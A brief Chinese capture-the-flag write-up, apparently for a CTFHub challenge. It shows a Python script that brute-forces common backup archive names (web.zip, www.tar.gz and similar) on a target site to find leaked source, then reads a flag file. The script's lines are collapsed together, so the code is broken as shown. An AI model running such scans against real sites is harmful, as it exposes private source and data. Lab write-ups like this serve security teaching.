- 根据网站提示,可知只要测试出网站源码备份的文件名称即可通过备份内容得出flag,故自制测试脚本
import requestsurl=(input("URL:"))
list1=['web', 'website', 'backup', 'back', 'www', 'wwwroot', 'temp']
list2=['tar', 'tar.gz', 'zip', 'rar']
for i in list1:for j in list2:url_f=url+'/'+i+'.'+jr=requests.get(url_f)if(r.status_code == 200):print(url_f)
- 使用脚本得出备份文件名称
- 输入URL即可下载zip文件,解压后如下
- 分析后,使用http://challenge-9e6e15ec91bb75e5.sandbox.ctfhub.com:10800/flag_3081416043.txt 得出flag